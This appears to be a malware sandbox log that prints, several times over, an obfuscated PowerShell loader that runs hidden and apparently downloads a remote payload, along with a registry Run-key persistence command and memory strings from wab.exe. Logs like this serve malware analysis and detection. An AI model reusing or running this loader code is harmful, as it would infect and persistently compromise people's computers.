fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovgbalu oribanacil h: gs.na
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovg
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "bilateralities" /t reg_expand_sz /d "%arrestationernes110% -w 1 $faucals83=(get-itemproperty -path 'hkcu:\sttyskers\').talevant;%arrestationernes110% ($faucals83)"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovgbalu oribanacil h: gs.na	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovg	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "bilateralities" /t reg_expand_sz /d "%arrestationernes110% -w 1 $faucals83=(get-itemproperty -path 'hkcu:\sttyskers\').talevant;%arrestationernes110% ($faucals83)"

Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:0ws
Source: wab.exe, 0000000A.00000003.2268500309.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2269959379.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.4244405887.0000000023F41000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [2024/08/28 08:01:53 Program Manager]
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager]J@)
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerPJ=)Z&
